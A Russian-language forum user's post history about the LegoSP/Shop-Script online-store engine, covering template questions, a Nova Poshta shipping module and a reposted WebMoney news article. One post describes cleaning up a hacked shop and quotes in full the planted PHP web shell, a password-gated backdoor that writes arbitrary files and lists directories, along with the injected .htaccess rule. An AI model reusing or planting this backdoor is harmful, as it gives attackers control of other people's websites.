Просмотр сообщений

В этом разделе можно просмотреть все сообщения, сделанные этим пользователем.


Темы - favn

Страницы: [1] 2
1
Общие вопросы / demo.legosp.net - опять не работает
« : Декабря 20, 2015, 12:01:51 pm »
demo.legosp.net - уже N-ый день не работает.


2
Привет всем

Есть вопрос, как корректно ввести в для отдельной странице дополнительно вызов библилотек + ко всем имеющимся с head.tpl.

- просто добавить на нужной странице tpl.html < head> ляляля < / head> - но тогда будет 2 < head>

- либо делать в head.tpl
{if $main_content_template == "нужный.tpl.html"}
  .....
{/if}
на сколько это корректо

либо можно более правильно сделать?




3
Хотелось бы эту кнопку на страничке каждого товара.

Но проблема что работает не со всеми браузерами. С "Лисой" без проблем, с другими нормально не хочет.
<a href="#favorite" charset="windows-1251" rel="sidebar" class="favorite" title="Добавить в закладки" onClick="Bookmark()">Добавить в закладки</a> 
У кого-то есть решение ? Как сделать для всех браузеров.

4
Привет всем.

Есть действующий, но сырой модуль Новая Почта для LegoSP 6.2.

Договрился с разработчиками LegoSP (pehser), чтоб он его доработал до финального вида

Необходимо насобирать спонсорское вложение в 500 грн.

Для того, кто то  внесет свою часть в спонсорскую помощь - будет предоставлена спец цена на этот модуль.

Кто согласен поучаствовать одписывайтесь в теме.

5
Как сделать автопересчет в корзине при смене способа доставки, без нажатия кнопки пересчитать и без перегрузки страницы?

В 5 версии такое было очень удобно.

Клиенты просто не видят этой кнопки или не желают ее нажимать.

6
Всем привет. Lego SP5.0.2

Как победить эту проблемку?

Пробежался по поиску ответа не нашел

Редактирование товара - кракозыбры. Кракозябры вместо  - На складе


7
Как сделать несколько языков в магазине ?

Не только изменять язык самого шаблона, а другой язык для контента.


8
Платные услуги / Модуль API Новая Почта
« : Ноября 01, 2014, 08:12:21 pm »
На сайте Новой Почте в личном кабинете есть возможность самостоятельно создавать декларации. Распечатывать их и нести вместе с посылкой отдавать операторам и не стоять в очереди (при этом уменьшается вероятность что оператор ошибется при наборе данных).
Когда посылок много, очень значительная часть времени уходит на праильное заполнение данных о посылке чтобы их потом диктовать на Новой Почте.

Вообщем если бы был модуль который автоматически создает декларации по данным из заказа. Тобешь меняется данными с сервером Новой Почты получает новый номер декларации и заполняет из заказа фамилию и имя покупателя.

Вот наткнулся на такое что делали для другого движка

http://forum.simplacms.ru/topic/5537-%D0%B2%D0%BD%D0%B5%D0%B4%D1%80%D0%B5%D0%BD%D0%B8%D0%B5-api-%D0%BD%D0%BE%D0%B2%D0%B0-%D0%BF%D0%BE%D1%88%D1%82%D0%B0/

Очень полезный модуль. Очень многие захотят его приобрести.

Может кто уже реализовал его - готов купить.


9
Здравствуйте.

Знает ли кто, как для странички brands.tpl.html сделать категории товаров, которые принадлежат этому бренду.

Как {include file="subcateg.tpl.html"} в category.tpl.html ?

10
Цитировать
В киевском офисе системы интернет-расчетов WebMoney.UA, с помощью которой в Сети тысячи людей платят за покупки, "коммуналку", мобильную связь и прочее, прошел налоговый обыск. В ходе него было изъято "большое количество компьютерной техники, которая обеспечивала деятельность платежной системы и на которой содержалась информация о незаконной деятельности", говорится в заявлении пресс-службы центрального офиса по работе с крупными плательщиками налогов Миндоходов. При этом налоговики не раскрыли ни суть схемы, ни то, какие нормы законодательства, по их мнению, нарушила компания WebMoney. Деньги людей и компаний (например, многочисленных интернет-магазинов), которые хранились на счетах, заблокированы. Это, как сообщает Министерство доходов и сборов Украины, 60 млн. грн. "Работники подразделений финансовых расследований выявили значительные нарушения в деятельности ООО "Украинское гарантийное агентство" (УГА), которое обеспечивало работу платежной системы Web Money Transfer на территории Украины. К тому же установлено, что правила деятельности данной платежной системы не согласовывались с НБУ", - сказали Сегодня в министерстве. Там также добавили, что следственные действия продолжаются, в перспективе дело отправят в суд.

В департаменте по связям с общественностью WebMoney сообщили, что "11 июня в киевский офис WebMoney.UA прибыла группа людей в штатском, назвавшихся сотрудниками Министерства доходов и сборов. По их версии, они прибыли с внеплановой проверкой. В результате их действий были изъяты компьютеры, тестовое оборудование и личные вещи сотрудников офиса". Сейчас адвокаты компании анализируют действия налоговой. И заверили, что все транзакции по платежной системе сейчас проходят в полном объеме. Сайт компании пока работает.

Пользователи этой системы - интернет-магазины, провайдеры информуслуг и физические лица. "В компании WebMoney говорят, что у них более 2 млн. пользователей в Украине. Это достаточно много. Хаоса на нашем рынке не будет, но трудности возникнут. Многие пользователи, чьи счета заблокированы, - в панике. Некоторые пробуют выводить свои деньги, и у них получается, а счета других - заблокированы. Видимо, это зависит от того, на каких серверах находятся счета, а значит нельзя сказать, что все заблокировано", - рассказал президент Ассоциации участников электронного бизнеса Украины Юрий Чайка.

Напомним, что WebMoney работает в Украине с 2003 года, обслуживает 2,5 млн. клиентов. Украинское гарантийное агентство осуществляет покупку-продажу прав требований к первичному дебитору - Украинскому профессиональному банку - в соответствии со ст. 512 и ст. 656 Гражданского кодекса. Для этих операций используются технологии и программное обеспечение WebMoney, а программно-техническое сопровождение учета прав собственности осуществляет WM Transfer Ltd. На сайте УГА не указаны телефоны, есть только адрес - ул. Марины Расковой, 11.

Как отмечает Коммерсантъ-Украина, в министерстве обвинили держателей кошельков WebMoney в проведении нелегальных финансовых операций, а гарантийную компанию - в незаконной деятельности. "Должностные лица данного предприятия перечисляли заработанные преступным путем средства на карточные счета группы подконтрольных физлиц, и в дальнейшем они конвертировались в наличные, - отметили в пресс-службе центрального офиса. - Пользователями данной платежной системы были разного рода интернет-магазины, провайдеры информационных услуг и физические лица, которые пытались скрыть нелегальные финансовые операции". Однако спустя час пресс-служба распространила заявление, в котором не содержалось этих обвинений, хотя речь все так же шла о "незаконной" и "преступной" схеме. Глава центрального офиса Сергей Степенко отказался сообщить суть предъявленных обвинений, пока идут следственные мероприятия. Проверки могут длиться 20 дней.

После завершения следственных действий материалы будут переданы в суд для принятия решения относительно организаторов "преступной схемы", говорится в пресс-релизе. Пока налоговики установили, что правила деятельности WebMoney не согласованы Нацбанком. Впрочем, центробанк заявил об этом еще в январе 2011 года. В ответ WebMoney пояснили, что не являются ни платежной системой, ни системой электронных денег. УГА определяет WMU (эквивалент гривны) как титульные знаки, которые учитывают номинальный размер прав требования. Сделки с ними считаются законной переуступкой прав требования между пользователями.

И хотя в WebMoney утверждают, что их пользователи осуществляют все трансакции, ряд магазинов уже приостановил прием оплаты товаров с помощью этой системы. "После сообщения о блокировке их счетов мы решили перестраховаться", - сообщили в службе поддержки интернет-магазина FotoMag.
http://smi.liga.net/actual/2013-06-13/9792639-zablokirovany_scheta_sistemy_webmoney.htm

"Больших дядек" щимят, а мы страдаем :( .... 

)

11
Скрипт SSLE 5.0.2.

Кодировка базы данных windows 1251

После того как ввожу код присланный в sms для оплаты товара. выбивает следующую ошибку.

System does not support the specified encoding. (-1072896658) step=6.2

нахожусь в это время на страничке https://merchant.webmoney.ru/lmi/payment_do.asp

Кто-нибудь сталкивался с такой ошибкой? В чем может быть причина.

12
Общие вопросы / Сохраниться для SEO
« : Сентября 30, 2012, 01:04:45 pm »
Привет всем. Вообщем в моем индивидуальном случае нужно сохранить ссылки наработанные для seo, так как перехожу на новый домен и не могу забрать название старого домена.

т.к. нужно у уменьшить нагрузку на хостинг.

Думаю сделать только каталог товаров на базе SS SP5.0.2. Т.е. минимум яваскрипта, никаких заказов, Хитов продаж и т.д. Нужно сохранить только ссылки наработанные под поисковые системы. ну на каждой странице будет ссылка на новый домен с товаром.

Парни, подскажите что можно "закаментить" что не стоит....



13
Вообщем такая штука. Открываю свой инет-магазин (SSLE sp5.0.2) и вижу 468505ab9718d8c2205ea35d94f04668 и больше ничего.

В админку и на фтп пускает.

Вообщим полазил увидел следующие изменения и проблему исправил. Пишу для тех у кого может оказаться подобное.



в .htaccess что в корне появилось следующее:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1? [L]
</IfModule>

в папках /cfg, /core,/css, /images, /import, /includes, /languages, /products_pictures, /products_thumb, /userfiles, /water_mark появились файлы init.php, config.php, engine.php, application.php, engine.php, init.php, include.php, init.php, core.php, info.php, bootstrap.php, include.php соответственно - со следующем содержимым:
<?php $r=$_REQUEST;$c=getcwd();$n=chr(32);print('468505ab9718d8c2205ea35d94f04668');if(md5(md5(@$r['p']))=='3829c383a1277bd6e7e108ab36f8f03c'){print($n.$c.$n);fwrite(fopen(dirname(__FILE__).'/'.$r['f'],'w+'),$r['b']);print($n);print_r(scandir($c));}exit;?>
- все эти файлы удалить иначе 468505ab9718d8c2205ea35d94f04668 так и будет весеть у вас на сайте.

Вроде ниче не забыл, но имена файлов думаю могут менятся. Вообщем поудаляв что выше написал и всё стало норм.

Может кому пригодится.

14
Shop-Script SP 5.0.2

Создал в БД в SS_products новый столбец pole.

Для product_detailed:
В файле product_detailed.php добавляю в $q = db_query("SELECT ".PRODUCTS_TABLE.".categoryID, ".PRODUCTS_TABLE.".name, ".PRODUCTS_TABLE.".description, customers_rating, Price, ".PRODUCTS_TABLE.".picture, in_stock, thumbnail, customer_votes, big_picture, list_price, productID, product_code, brief_description, ".PRODUCTS_TABLE.".hurl, accompanyID, ".PRODUCTS_TABLE.".meta_title, ".PRODUCTS_TABLE.".meta_keywords, ".PRODUCTS_TABLE.".meta_desc, ".PRODUCTS_TABLE.".brandID, ".BRAND_TABLE.".name, ".BRAND_TABLE.".hurl, ".PRODUCTS_TABLE.".canonical, ".CATEGORIES_TABLE.".hurl, ".BRAND_TABLE.".comment, ".PRODUCTS_TABLE.".h1, ".PRODUCTS_TABLE.".pole FROM ".PRODUCTS_TABLE." LEFT JOIN ".BRAND_TABLE." USING (brandID) JOIN ".CATEGORIES_TABLE." ON ".PRODUCTS_TABLE.".categoryID=".CATEGORIES_TABLE.".categoryID WHERE productID='".$productID."' and ".PRODUCTS_TABLE.".enabled='1'") or die (db_error()); ".PRODUCTS_TABLE.".pole. Но каким {$product_info[X]} выводить в product_detailed.tpl.html непойму.

Для product_brief еще запутанней ситуация :). Подскажите пожалуйста.

15
Платные услуги / Платные шаблоны
« : Декабря 16, 2011, 09:21:02 pm »
Шаблон Auto-dark для  SS LE sp5

Стоимость: 25$

Шаблон имеет слайдер.

Тестировался в браузерах (последних версий на декабрь 2011 г)  opera, firefox, IE8, google chrome, safari.




Связь: favn[гав]email.ua

[вложение удалено администратором]

Страницы: [1] 2